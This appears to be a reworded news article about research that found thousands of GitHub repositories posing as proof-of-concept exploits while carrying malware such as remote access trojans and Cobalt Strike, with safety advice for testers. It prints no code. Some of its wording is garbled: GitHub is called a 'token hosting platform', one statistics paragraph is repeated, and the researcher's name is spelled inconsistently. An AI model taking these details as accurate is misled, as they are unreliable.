Min menu

Pages

Featured Articles

Thousands of GitHub repositories provide fake PoC hacks with malware



Researchers at the Leiden Institute for Advanced Computer Science have found thousands of repositories on GitHub that provide fake Proof of Concept (PoC) exploits for many security vulnerabilities, some of which are including malware.


GitHub is one of the largest token hosting platforms, and researchers use it to publish PoC vulnerabilities to help the security community check for fixes for vulnerabilities or determine the impact and scope of the flaw.


Read More: 9 Benefits of Having a Business Management Degree



According to a technical paper prepared by researchers at the Leiden Institute for Advanced Computer Science, the probability of infection with malware rather than acquiring a PoC could be as high as 10.3%, excluding fake and counterfeit programs installed.


Thousands of GitHub repositories provide fake PoC hacks with malware




Data collection and analysis




The researchers analyzed just over 47,300 repositories announcing an exploit for a vulnerability detected between 2017 and 2021 using the following three mechanisms:


  • IP Address Analysis: Comparison of the PoC publisher's IP address against public blocklists, VT, and AbuseIPDB.
  • Binary analysis: Run VirusTotal tests on available executables and hash them.
  • Hexadecimal and Base64 parsing: Decrypts obfuscated files before performing binary checks and IP checks.




Of the 150,734 unique IP addresses extracted, 2,864 identical entries in the block list, 1,522 malicious items were detected in antivirus scans on Virus Total, and 1069 of them were in the AbuseIPDB database.




Of the 150,734 unique IP addresses extracted, 2,864 identical entries in the block list, 1,522 malicious items were detected in antivirus scans on Virus Total, and 1069 of them were in the AbuseIPDB database.




The binary analysis examined a set of 6,160 executables and revealed a total of 2,164 malicious samples hosted in 1,398 repositories.


In total, 4,893 out of 47,313 tested repositories were considered malicious, most of them related to vulnerabilities as of 2020.




The report contains a small set of repositories with fake PoC that transmit malware. However, researchers have shared with BleepingComputer at least 60 other examples that are still alive and in the process of being removed by GitHub.




Malware in PoC



By looking closely at some of these cases, researchers have found a large number of different malware and malicious scripts, ranging from remote access Trojans to Cobalt Strike.




One interesting case is the PoC case of CVE-2019-0708, known as "BlueKeep", which contains a base 64 obfuscated Python script that brings VBScript from Pastebin.


The script is Houdini RAT, an old JavaScript-based Trojan that supports remote command execution via Windows CMD.





In another case, researchers discovered a fake PoC that was an information thief that collected system information, IP address, and user agent.


This was previously created as a security experiment by another researcher, so finding it using the automated tool was a confirmation to the researchers that their approach was working.



One of the researchers, Yadmani Sufyan, who is also a security researcher at Darktrace, was kind enough to provide BleepingComputer with additional examples not included in the technical report, which are given below:


PowerShell PoC contains a base64-encoded binary that has been flagged as malicious in Virus Total.





The Python PoC has a single line that decrypts the encrypted base64 payload that has been flagged as malicious on Virus Total.



The fake BlueKeep exploit contains an executable that has been flagged by most antivirus engines as malicious, and identified as Cobalt Strike.



Hidden script inside a fake PoC that contains inactive malicious components that can cause harm if desired by its author.




How do you keep yourself safe



Blindly trusting a repository on GitHub from an unverified source would be a bad idea because the content is not moderated, so it is up to users to review it before using it.


Software testers are advised to carefully scrutinize the access points they download and run as often as possible before implementing them.


Sofian believes that all testers should follow these three steps:


  • Carefully read the code you are about to run on your network or your client's network.
  • If the code is too ambiguous and you need a lot of time to parse it manually, then sandbox it in an environment (eg: an isolated virtual machine) and check your network for any suspicious traffic.
  • Use open source intelligence tools like VirusTotal to analyze binaries.



The researchers reported all the malicious repositories they found to GitHub, but it will take some time for all of these repositories to be reviewed and removed, so many of them are still publicly available.




As Sufian explained, their study is intended not only to serve as a one-time cleanup procedure on GitHub, but also to serve as a catalyst for developing an automated solution that can be used to flag malicious instructions in uploaded code.






Comments